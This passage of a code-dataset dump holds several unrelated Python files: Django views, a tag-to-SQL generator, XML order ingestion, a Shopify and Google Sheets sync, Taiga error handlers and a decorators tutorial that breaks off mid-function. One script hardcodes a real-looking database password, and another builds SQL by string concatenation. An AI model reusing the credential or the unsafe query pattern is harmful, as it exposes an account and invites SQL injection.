queryset = Sample.objects.all()\n serializer_class = SampleSerializer\n\n\nclass ResultList(APIView):\n\n def get(self, request, format=None):\n user = self.request.user\n results = 
Result.objects.filter(user=user)\n serializer = ResultSerializer(results, many=True)\n return Response(serializer.data)\n\n\n def post(self, request, format=None):\n user = self.request.user\n request_serializer = ResultRequestSerializer(data=request.data)\n if request_serializer.is_valid(): # check if result is present \n inventory_id = request_serializer.data.get(\"inventory\")\n present_results = Result.objects.filter(user=user, inventory=inventory_id)\n if present_results.exists(): # if present - return\n result_serializer = ResultSerializer(present_results, many=True)\n return Response(result_serializer.data, status=status.HTTP_200_OK)\n else: # if not present - create and return\n inventory = Inventory.objects.filter(pk=inventory_id).first()\n scales = inventory.scales.all() # get all scales for the test\n new_results = [s.calculate_result(user=user, inventory=inventory_id) for s in scales]\n result_serializer = ResultSerializer(new_results, many=True)\n progress = Progress(\n user=user, \n inventory=Inventory(pk=inventory_id),\n status=\"DONE\", \n )\n progress.save()\n return Response(result_serializer.data, status=status.HTTP_201_CREATED)\n return Response(request_serializer.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"DanielTitkov/vkpsytest-backend","sub_path":"inventories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32663859486","text":"# coding: utf-8\n# @Time : 2019/5/11 20:41\n# @Author : zhongshan\n# @Email : 15926220700@139.com\n\nimport time\n\nfrom TagBase.config import (\n TAG_ATTRS_MAP,\n TABLE_NAME_T_TAG,\n TABLE_NAME_T_TAG_VALUE,\n)\nfrom TagBase.template import (\n t_tag_ins_template,\n t_tag_value_ins_template\n)\nfrom TagProc.template_c12 import (\n DB_CONFIG,\n CUSTOM_ID,\n TAG_FILE_PATH,\n)\nfrom common.db_api import DBApi\n\n\nclass TagInfoPrc(object):\n \"\"\" 标签信息类\n 主要负责载入标签信息文件,生成插入数据库t_tag和t_tag_value表的信息\n \"\"\"\n\n def __init__(self, file_path, custom_id, db_config):\n # 标签值表文件路径\n self.file_path = file_path\n self.custom_id = custom_id\n self.tags = []\n self.tag_attrs = []\n self.tag_1_attrs = []\n self.tag_1_ids = {}\n self.db = DBApi(db_config)\n\n # 当前时间\n self.curr_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n # 读取标签文件\n self.read_tag_file()\n\n def read_tag_file(self):\n \"\"\" 读标签值表\n :type tables: \n :param tables: \n :rtype: list\n :return: 标签值表中内容载入二维list\n \"\"\"\n # 读取文件\n with open(self.file_path, 'r', encoding='gbk') as f:\n for line in f.readlines():\n self.tags.append(line.strip('\\n').split(','))\n print(self.tags)\n\n # 解析第一行,确定字段位置\n def pos(str1):\n return self.tags[0].index(str1) if str1 in self.tags[0] else 0\n\n tag_attrs_pos = dict(zip(TAG_ATTRS_MAP, (map(pos, TAG_ATTRS_MAP.values()))))\n print(tag_attrs_pos)\n\n # 标签信息行结构化\n self.tag_attrs = []\n for line in self.tags[1:]:\n tag_attr = {'level_1': line[tag_attrs_pos['level_1']],\n 'level_2': line[tag_attrs_pos['level_2']],\n 'level_2_eng': line[tag_attrs_pos['level_2_eng']],\n 'multi': True if line[tag_attrs_pos['multi']] == '是' else False,\n 'level_3s': list(filter(None, line[tag_attrs_pos['level_3_base']:]))}\n self.tag_attrs.append(tag_attr)\n print(self.tag_attrs[-1])\n\n # 一级标签信息列表\n self.tag_1_attrs = []\n for tag_attr in self.tag_attrs:\n if tag_attr['level_1'] not in self.tag_1_attrs:\n self.tag_1_attrs.append(tag_attr['level_1'])\n print(self.tag_1_attrs)\n\n def tag_level_1_prc(self):\n 
\"\"\" 处理一级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for line in self.tag_1_attrs:\n template_dict = {\n 't_tag': TABLE_NAME_T_TAG,\n 'customer_id': self.custom_id,\n 'pid': 0,\n 'tag_name': trans(line),\n 'tag_define': 'null',\n 'dld_field_name': 'null',\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_ins.sql', 'w+', encoding='utf8') as f:\n f.write('-- -------------------------------\\n')\n f.write('-- Records of ' + self.curr_time + '\\n')\n f.write('-- -------------------------------\\n')\n f.write('-- 一级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n # 在标签数据库t_tag中读取一级标签的id,因为二级标签需要设置其父id\n sql = 'select id from t_tag where status = 1 and ' \\\n 'customer_id = %(customer_id)s and pid = 0 and tag_name = %(tag_name)s'\n self.tag_1_ids = {}\n for line in self.tag_1_attrs:\n self.tag_1_ids[line] = self.db.query_one(sql, {\"customer_id\": self.custom_id, \"tag_name\": line})[0]\n print(self.tag_1_ids)\n\n def tag_level_2_prc(self):\n \"\"\" 处理二级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for tag_attr in self.tag_attrs:\n template_dict = {\n 't_tag': TABLE_NAME_T_TAG,\n 'customer_id': self.custom_id,\n 'pid': self.tag_1_ids[tag_attr['level_1']],\n 'tag_name': trans(tag_attr['level_2']),\n 'tag_define': 'null',\n 'dld_field_name': trans('t_u_' + tag_attr['level_2_eng']),\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_ins.sql', 'a+', encoding='utf8') as f:\n f.write('\\n-- 二级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n # 读取二级标签的id,因为三级标签需要设置其二级标签id\n sql = 'select id from t_tag where status = 1 and ' \\\n 'customer_id = %(customer_id)s and pid = %(pid)s and tag_name = %(tag_name)s'\n for tag_attr in self.tag_attrs:\n tag_attr['level_2_id'] = self.db.query_one(sql, {\"customer_id\": self.custom_id,\n \"pid\": self.tag_1_ids[tag_attr['level_1']],\n \"tag_name\": tag_attr['level_2']})[0]\n print(self.tag_attrs)\n\n def tag_level_3_prc(self):\n \"\"\" 处理三级标签\n :type tables: \n :param tables: \n :rtype: \n :return: \n \"\"\"\n\n # 生成insert语句\n def trans(str1):\n return \"'\" + str1 + \"'\"\n\n sqls = []\n for tag_attr in self.tag_attrs:\n for idx, level_3 in enumerate(tag_attr['level_3s']):\n tag_field_name = 't_u_' + tag_attr['level_2_eng']\n template_dict = {\n 't_tag_value': TABLE_NAME_T_TAG_VALUE,\n 'tag_id': tag_attr['level_2_id'],\n 'value_name': trans(level_3),\n 'match_rule': trans('eq'),\n 'match_val': trans('1') if tag_attr['multi'] else trans(str(idx)),\n 'tag_field_name': trans(tag_field_name + '_' + str(idx))\n if tag_attr['multi'] else trans(tag_field_name),\n 'create_time': trans(self.curr_time),\n 'update_time': trans(self.curr_time),\n 'status': 1,\n }\n sql = t_tag_value_ins_template.substitute(template_dict)\n sqls.append(sql)\n print(sql)\n\n # 写入sql文件\n with open('../../outfile/t_tag_value_ins.sql', 'w+', encoding='utf8') as f:\n f.write('-- 
-------------------------------\\n')\n f.write('-- Records of ' + self.curr_time + '\\n')\n f.write('-- -------------------------------\\n')\n f.write('-- 三级标签\\n')\n for line in sqls:\n f.write(line + '\\n')\n\n # 执行sql\n for sql in sqls:\n print(self.db.modify(sql))\n\n\nif __name__ == \"__main__\":\n t = TagInfoPrc(TAG_FILE_PATH, CUSTOM_ID, DB_CONFIG)\n t.tag_level_1_prc()\n t.tag_level_2_prc()\n t.tag_level_3_prc()\n print(\"Finish\")\n","repo_name":"super-season/centos-yum-mount","sub_path":"python/fcmp_tag_logic_py-zlz-liu/src/TagBase/tag_info_prc.py","file_name":"tag_info_prc.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40976166617","text":"# -*- coding: utf-8 -*\n\nif __name__ == '__main__':\n # Variaveis\n vetor = []\n\n # Capturar os 100 valores do vetor\n while(len(vetor) < 100):\n # Entrada\n valor = float(input())\n vetor.append(valor)\n\n # Restricao para impressao dos valores\n if(valor <= 10):\n # Resultado\n print(\"A[\" + str(len(vetor) - 1) + \"] = %.1f\" % valor)","repo_name":"CleitonSilvaT/URI_Python","sub_path":"1-Iniciante/1174.py","file_name":"1174.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25768703541","text":"import xml.etree.ElementTree as ET\r\nimport psycopg2\r\nimport datetime\r\n\r\n\r\ndef db_inserir_ordem(numero_de_ordem, tipo_de_ordem, quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem):\r\n \r\n connection= psycopg2.connect(host=\"db.fe.up.pt\", database=\"up201603858\", user=\"up201603858\", password=\"onr482mNS\", port=\"5432\")\r\n connection.autocommit= True\r\n cursor = connection.cursor()\r\n \r\n sql_insert_query = (\"\"\"INSERT INTO \"Ordens\" (\"ID\",\"Tipo\",\"estado\",\"pecas_processadas\",\"pecas_em_processamento\",\"pecas_pendentes\",\"peca_inicial\", \"peca_final\", \"Destino\", \"hora_entrada_ordem\") VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\"\")\r\n \r\n insert_tuple = (numero_de_ordem , tipo_de_ordem, 'pendente','0', '0', quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem)\r\n \r\n cursor.execute(sql_insert_query, insert_tuple)\r\n \r\n connection.commit()\r\n \r\n connection.close()\r\n\r\n return\r\n\r\n\r\n \r\ntree = ET.parse('command4.xml') \r\nroot = tree.getroot()\r\n\r\nfor order in root: #can be a order(transform ou unload) or a upload\r\n hora_entrada_ordem = datetime.datetime.now()\r\n\r\n if(order.tag == 'Request_Stores'):\r\n print('Ordem de carga')\r\n ## ----------- manda a ordem de carga para o PLC ?? 
--------- ######\r\n elif(order.tag == 'Order'):\r\n numero_de_ordem = order.get('Number')\r\n print('numero de ordem: ' + numero_de_ordem)\r\n for transform in order.iter('Transform'):\r\n tipo_de_ordem = str(transform.tag)\r\n print('tipo de ordem: '+ tipo_de_ordem)\r\n peca_inicial = transform.get('From')\r\n peca_final = transform.get('To')\r\n destino=0\r\n print('Transformar P'+peca_inicial[1]+ ' em P'+ peca_final[1])\r\n quantidade = transform.get('Quantity')\r\n print('Numa quantidade: '+ quantidade)\r\n print()\r\n \r\n \r\n\r\n for unload in order.iter('Unload'):\r\n tipo_de_ordem = str(unload.tag)\r\n print('tipo de ordem: '+ tipo_de_ordem)\r\n peca = unload.get('Type')\r\n print('Unload da P'+peca_inicial[1])\r\n destino = unload.get('Destination')\r\n print('Para o destino: '+ destino[1])\r\n quantidade = unload.get('Quantity')\r\n print('Numa quantidade: '+ quantidade)\r\n \r\n \r\n db_inserir_ordem(numero_de_ordem, tipo_de_ordem, quantidade, peca_inicial, peca_final, destino, hora_entrada_ordem)\r\n print(destino)\r\n \r\n\r\nprint('conexao feita')\r\n\r\n\r\n\r\n","repo_name":"MIEEC/test","sub_path":"codigo/read_xml_e_bd_inicial.py","file_name":"read_xml_e_bd_inicial.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29135854546","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport httplib2\nimport os\nimport time\nimport json\nimport shopify\nimport configparser\nimport requests\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Hunger Work Studio Orders'\n\n# SHOPIFY Portion\nconfig = configparser.ConfigParser()\nconfig.read('shopify.ini')\n\nAPI_KEY = config['SHOPIFY']['API_KEY']\nPASSWORD = config['SHOPIFY']['PASSWORD']\nSHOP_NAME = config['SHOPIFY']['SHOP_NAME']\n\nshop_url = \"https://%s:%s@%s.myshopify.com/admin\" % (API_KEY, PASSWORD, SHOP_NAME)\nshopify.ShopifyResource.set_site(shop_url)\nshop = shopify.Shop.current()\n\n# Grab Shopify Orders\norder_url = \"https://%s:%s@%s.myshopify.com/admin/orders.json\" % (API_KEY, PASSWORD, SHOP_NAME)\nresponse = requests.get(order_url)\njson_data = json.loads(response.content)\n\n# write to file (optional; uncomment to enable)\n# filename = 'orders-[%s].txt' % time.ctime()\n\n# with open('neworders1.txt', 'w') as outfile:\n # json.dump(json_data, outfile)\n\n# Save Order details into python dictionary to send to Google Sheets API\nordersData = []\norderDetails = ['Last Updated', 'Email', 'Customer ID', 'IP', 'Title', 'Properties']\n# orderDetails = ['Email', 'IP', 'Title', 'Name1', 'Value1', 'Name2', 'Value2', 'Name3', 'Value3', 'Name4', 'Value4', 'Name5', 'Value5']\nordersData += [orderDetails]\n\nfor i in json_data['orders']:\n for line in i['line_items']:\n # Check for specific order name\n if 'Create/Update Event Entry' in line['title']:\n lastUpdated = i['updated_at']\n title = line['title']\n properties = str(line['properties'])\n ip = i['client_details']['browser_ip']\n try:\n email = i['customer']['email']\n except 
KeyError:\n # no email\n print('No email for order')\n email = 'No email for order'\n customer_id = i['customer']['id']\n ordersData.append([lastUpdated, email, customer_id, ip, title, properties])\n\ndataToInsert = { 'values': ordersData }\n\n\n# Google Sheets API authentication\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n \"\"\" Authenticate with OAuth, create a timestamped Sheet with orders\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n \n data = dataToInsert\n \n SHEET_ID = '1dO3YavokqF72F_tzXhiw-OJdXy5MkBhDxtT3rSmfBzo'\n\n service.spreadsheets().values().update(spreadsheetId=SHEET_ID,\n range='Sheet1', body=data, valueInputOption='RAW').execute()\n print('Wrote data to Sheet:')\n rows = service.spreadsheets().values().get(spreadsheetId=SHEET_ID,\n range='Sheet1').execute().get('values', [])\n for row in rows:\n print(row)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kialam/hws-shopify-sheets-integration","sub_path":"googlesheets.py","file_name":"googlesheets.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33541108842","text":"class Solution:\n def isPalindrome(self, s: str) -> bool:\n \"\"\"\n INPUT: string s\n OUTPUT: true if palindrome, false if not\n NOTE:\n \n ignore spaces,\n ignore commas\n contains numbers\n \n SOLUTION:\n \n \"\"\"\n s_list = [i.lower() for i in s if i.isalnum()]\n \n s_len = len(s_list)\n mid = s_len // 2\n for i in range(mid):\n if s_list[i] != s_list[s_len - i - 1]: return False\n \n return True","repo_name":"n-alex-goncalves/Leetcode-Blind-75","sub_path":"leetcode answers/Valid Palindrome.py","file_name":"Valid Palindrome.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"23931683708","text":"import http\n\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.exceptions import RequestValidationError\nfrom starlette.exceptions import HTTPException\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\nfrom starlette.status import HTTP_400_BAD_REQUEST, HTTP_422_UNPROCESSABLE_ENTITY\nfrom taiga.base.services.exceptions import TaigaServiceException\nfrom taiga.base.utils.strings import camel_to_kebab\nfrom taiga.exceptions.api import HTTPException as 
TaigaHTTPException\nfrom taiga.exceptions.api import codes\n\n\nasync def http_exception_handler(request: Request, exc: HTTPException) -> JSONResponse:\n if isinstance(exc, TaigaHTTPException):\n http_exc_code = getattr(exc, \"code\", codes.EX_UNKNOWN.code)\n http_exc_msg = getattr(exc, \"msg\", codes.EX_UNKNOWN.msg)\n else: # Starlette's HTTPException\n http_exc_code = http.HTTPStatus(exc.status_code).phrase.replace(\" \", \"-\").lower()\n http_exc_msg = http.HTTPStatus(exc.status_code).description\n\n http_exc_detail = exc.detail\n\n content = {\n \"error\": {\n \"code\": http_exc_code,\n \"detail\": http_exc_detail,\n \"msg\": http_exc_msg,\n }\n }\n\n headers = getattr(exc, \"headers\", None)\n if headers:\n return JSONResponse(status_code=exc.status_code, content=content, headers=headers)\n else:\n return JSONResponse(status_code=exc.status_code, content=content)\n\n\nasync def taiga_service_exception_handler(request: Request, exc: TaigaServiceException) -> JSONResponse:\n return JSONResponse(\n status_code=HTTP_400_BAD_REQUEST,\n content={\n \"error\": {\n \"code\": codes.EX_BAD_REQUEST.code,\n \"detail\": camel_to_kebab(exc.__class__.__name__),\n \"msg\": str(exc),\n }\n },\n )\n\n\nasync def request_validation_exception_handler(request: Request, exc: RequestValidationError) -> JSONResponse:\n return JSONResponse(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n content={\n \"error\": {\n \"code\": codes.EX_VALIDATION_ERROR.code,\n \"detail\": jsonable_encoder(exc.errors()),\n \"msg\": codes.EX_VALIDATION_ERROR.msg,\n }\n },\n )\n","repo_name":"taigaio/taiga","sub_path":"python/apps/taiga/src/taiga/exceptions/api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"75"} +{"seq_id":"41264214587","text":"# https: // pythonbasics.org/decorators/\n\nimport requests\nfrom ast import arg\nfrom time import perf_counter\nimport tracemalloc\nfrom functools import wraps\nfrom datetime import datetime\nimport sys\nimport time\n\n\ndef hello(): # type: ignore\n print(\"Hello\")\n\n\nmessage = hello\n\n# Uncomment to check below decorator function\nmessage()\n\n\ndef hello(func):\n def inner():\n print(\"Hello\")\n func()\n return inner\n\n\n@hello\ndef name():\n print(\"Alice\")\n\n# Uncomment to check below decorator function\n# obj = hello(name)\n# obj()\n# name()\n\n\ndef dec_sum_ab(func):\n def inner(a, b):\n print(str(a) + \" + \"+str(b)+\" is \", end=\"\")\n return func(a, b)\n\n return inner\n\n\n@dec_sum_ab\ndef sum_ab(a, b):\n res = a + b\n print(res)\n\n# Uncomment to check below decorator function\n# sum_ab(3, 4)\n\n\n\"\"\" \n Real world examples\n Use Case: Time measurement\n\n\"\"\"\n\n\ndef measure_time(func):\n\n def wrapper(*arg):\n t = time.time()\n res = func(*arg)\n\n print(\"Function took \" + str(time.time()-t) + \" seconds to run\")\n\n return res\n return wrapper\n\n\n@measure_time\ndef my_func(n): # type: ignore\n time.sleep(n)\n\n# my_func(2)\n\n# What is a Python Decorator\n# The \"decorators\" we talk about with concern to Python are not exactly the same thing as the DecoratorPattern described above. A Python decorator is a specific change to the Python syntax that allows us to more conveniently alter functions and methods (and possibly classes in a future version). 
This supports more readable applications of the DecoratorPattern but also other uses as well.\n\n\ndef simple_decorator(decorator):\n '''This decorator can be used to turn simple functions\n into well-behaved decorators, so long as the decorators\n are fairly simple. If a decorator expects a function and\n returns a function (no descriptors), and if it doesn't\n modify function attributes or docstring, then it is\n eligible to use this. Simply apply @simple_decorator to\n your decorator and it will automatically preserve the\n docstring and function attributes of functions to which\n it is applied.'''\n def new_decorator(f):\n g = decorator(f)\n g.__name__ = f.__name__\n g.__doc__ = f.__doc__\n g.__dict__.update(f.__dict__)\n return g\n # Now a few lines needed to make simple_decorator itself\n # be a well-behaved decorator.\n new_decorator.__name__ = decorator.__name__\n new_decorator.__doc__ = decorator.__doc__\n new_decorator.__dict__.update(decorator.__dict__)\n return new_decorator\n\n#\n# Sample Use:\n#\n\n\n@simple_decorator\ndef my_simple_logging_decorator(func):\n def you_will_never_see_this_name(*args, **kwargs):\n print('calling {}'.format(func.__name__))\n print(*args)\n print(**kwargs)\n return func(*args, **kwargs)\n return you_will_never_see_this_name\n\n\n@my_simple_logging_decorator\ndef double(x):\n 'Doubles a number.'\n return 2 * x\n\n\nassert double.__name__ == 'double'\nassert double.__doc__ == 'Doubles a number.'\n# Uncomment to check below decorator function\n# print(double(155))\n\n\"\"\"\n\"\"\"\n\n\ndef propget(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(func, doc=func.__doc__)\n else:\n doc = prop.__doc__ or func.__doc__\n prop = property(func, prop.fset, prop.fdel, doc)\n return prop\n\n\ndef propset(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(None, func, doc=func.__doc__)\n else:\n doc = prop.__doc__ or func.__doc__\n prop = property(prop.fget, func, prop.fdel, doc)\n return prop\n\n\ndef propdel(func):\n locals = sys._getframe(1).f_locals\n name = func.__name__\n prop = locals.get(name)\n if not isinstance(prop, property):\n prop = property(None, None, func, doc=func.__doc__)\n else:\n prop = property(prop.fget, prop.fset, func, prop.__doc__)\n return prop\n\n# These can be used like this:\n\n\nclass Example(object):\n\n @propget\n def myattr(self):\n return self._half * 2\n\n @propset\n def myattr(self, value):\n self._half = value / 2\n\n @propdel\n def myattr(self):\n del self._half\n\n\n# WHAT_TO_DEBUG = set(['io', 'core']) # change to what you need\n\n\n# class debug:\n# '''Decorator which helps to control what aspects of a program to debug\n# on per-function basis. 
Aspects are provided as list of arguments.\n# It DOESN'T slowdown functions which aren't supposed to be debugged.\n# '''\n\n# def __init__(self, aspects=None):\n# self.aspects = set(aspects)\n\n# def __call__(self, f):\n# if self.aspects & WHAT_TO_DEBUG:\n# def newf(*args, **kwds):\n# print ( sys.stderr, f.func_name, args, kwds)\n# f_result = f(*args, **kwds)\n# print ( sys.stderr, f.func_name, \"returned\", f_result)\n# return f_result\n# newf.__doc__ = f.__doc__\n# return newf\n# else:\n# return f\n\n\n# @debug(['io'])\n# def prn(x):\n# print (x)\n\n\n# @debug(['core'])\n# def mult(x, y):\n# return x * y\n\n\n# prn(mult(2, 2))\n\n# Read below examples when you want to revise decorators\n# https: // python-3-patterns-idioms-test.readthedocs.io/en/latest/PythonDecorators.html\n\n# What Can You Do With Decorators?\n# Decorators allow you to inject or modify code in functions or classes. Sounds a bit like Aspect-Oriented Programming(AOP) in Java, doesn’t it? Except that it’s both much simpler and (as a result) much more powerful. For example, suppose you’d like to do something at the entry and exit points of a function(such as perform some kind of security, tracing, locking, etc. – all the standard arguments for AOP). With decorators, it looks like this:\n\n# Class as decorators\nclass entry_exit(object): # type: ignore\n\n def __init__(self, f):\n self.f = f\n\n def __call__(self):\n print(\"Entering\", self.f.__name__)\n self.f()\n print(\"Exited\", self.f.__name__)\n\n\n@entry_exit\ndef func1(): # type: ignore\n print(\"inside func1()\")\n\n\n@entry_exit\ndef func2(): # type: ignore\n print(\"inside func2()\")\n\n\nfunc1()\nfunc2()\n\n\nprint()\n\n# Functions as decorators\n\n\ndef entry_exit(f):\n def new_f():\n print(\"Entering\", f.__name__)\n f()\n print(\"Exited\", f.__name__)\n new_f.__name__ = f.__name__\n return new_f\n\n\n@entry_exit\ndef func1():\n print(\"inside func1()\")\n\n\n@entry_exit\ndef func2():\n print(\"inside func2()\")\n\n\nfunc1()\nfunc2()\nprint(func1.__name__+\"\\n\")\n\n\n# Python Decorators without arguments\nclass decorator_without_arguments(object):\n\n def __init__(self, f):\n \"\"\"\n If there are no decorator arguments, the function\n to be decorated is passed to the constructor.\n \"\"\"\n print(\"Inside __init__()\")\n self.f = f\n\n def __call__(self, *args):\n \"\"\"\n The __call__ method is not called until the\n decorated function is called.\n \"\"\"\n print(\"Inside __call__()\")\n self.f(*args)\n print(\"After self.f(*args)\")\n\n\n@decorator_without_arguments\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"After first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"After second sayHello() call\\n\")\n# Notice that __init__() is the only method called to perform decoration, and __call__() is called every time you call the decorated sayHello().\n\n\n# Python Decorators with arguments.py\nclass decorator_with_arguments(object):\n\n def __init__(self, arg1, arg2, arg3):\n \"\"\"\n If there are decorator arguments, the function\n to be decorated is not passed to the constructor!\n \"\"\"\n print(\"Inside __init__()\")\n self.arg1 = arg1\n self.arg2 = arg2\n self.arg3 = arg3\n\n def __call__(self, f):\n \"\"\"\n If there are decorator arguments, __call__() is only called\n once, as part of the decoration process! 
You can only give\n it a single argument, which is the function object.\n \"\"\"\n print(\"Inside __call__()\")\n\n def wrapped_f(*args):\n print(\"Inside wrapped_f()\")\n print(\"Decorator arguments:\", self.arg1, self.arg2, self.arg3)\n f(*args)\n print(\"After f(*args)\")\n return wrapped_f\n\n\n@decorator_with_arguments(\"hello\", \"world\", 42)\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"after first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"after second sayHello() call\")\n# Now the process of decoration calls the constructor and then immediately invokes __call__(), which can only take a single argument (the function object) and must return the decorated function object that replaces the original. Notice that __call__() is now only invoked once, during decoration, and after that the decorated function that you return from __call__() is used for the actual calls.\n\n# Although this behavior makes sense – the constructor is now used to capture the decorator arguments, but the object __call__() can no longer be used as the decorated function call, so you must instead use __call__() to perform the decoration – it is nonetheless surprising the first time you see it because it’s acting so much differently than the no-argument case, and you must code the decorator very differently from the no-argument case.\n\n\n# Python Decorators_function_with_arguments\ndef decorator_function_with_arguments(arg1, arg2, arg3):\n def wrap(f):\n print(\"Inside wrap()\")\n\n def wrapped_f(*args):\n print(\"Inside wrapped_f()\")\n print(\"Decorator arguments:\", arg1, arg2, arg3)\n f(*args)\n print(\"After f(*args)\")\n return wrapped_f\n return wrap\n\n\n@decorator_function_with_arguments(\"hello\", \"world\", 42)\ndef sayHello(a1, a2, a3, a4):\n print('sayHello arguments:', a1, a2, a3, a4)\n\n\nprint(\"After decoration\")\n\nprint(\"Preparing to call sayHello()\")\nsayHello(\"say\", \"hello\", \"argument\", \"list\")\nprint(\"after first sayHello() call\")\nsayHello(\"a\", \"different\", \"set of\", \"arguments\")\nprint(\"after second sayHello() call\")\n\nprint()\n\n# https://www.freecodecamp.org/news/python-decorators-explained-with-examples/\n# When to Use a Decorator in Python\n# You'll use a decorator when you need to change the behavior of a function without modifying the function itself. A few good examples are when you want to add logging, test performance, perform caching, verify permissions, and so on.\n\n# You can also use one when you need to run the same code on multiple functions. 
This avoids you writing duplicating code.\n\n\ndef log_datetime(func):\n \"\"\"\n Log the date and time of a function \n \"\"\"\n\n def wrapper():\n print(\n f'Function: {func.__name__}\\nRun on: {datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")}')\n print(f'{\"-\"*30}')\n func()\n\n return wrapper\n\n\n@log_datetime\ndef daily_backup():\n print('Daily backup job has finished\\n')\n\n\nprint(daily_backup)\ndaily_backup()\n\n\ndef my_decorator_func(func):\n\n @wraps(func)\n # Functools wraps will update the decorator with the decorated functions attributes\n def wrapper_func(*args, **kwargs):\n func(*args, **kwargs)\n return wrapper_func\n\n\n@my_decorator_func\ndef my_func(my_args):\n '''Example docstring for function'''\n\n pass\n\n\nprint(my_func.__name__)\nprint(my_func.__doc__)\n\nprint()\n\n\ndef measure_performance(func):\n \"\"\"\n Measure performance of a function\n \"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n tracemalloc.start()\n start_time = perf_counter()\n func(*args, **kwargs)\n current, peak = tracemalloc.get_traced_memory()\n finish_time = perf_counter()\n print(f'Function: {func.__name__}')\n print(f'Method: {func.__doc__}')\n print(f'Memory usage:\\t\\t {current/10**6:.6f} MB \\n'\n f'Peak memory usage:\\t {peak/10**6:.6f} MB')\n print(f'Time elapsed in seconds: {finish_time - start_time:.6f}')\n print(f'{\"-\"*40}')\n tracemalloc.stop()\n return wrapper\n\n\n@measure_performance\ndef make_list1():\n \"\"\"Range\"\"\"\n my_list = list(range(100000))\n\n\n@measure_performance\ndef make_list2():\n 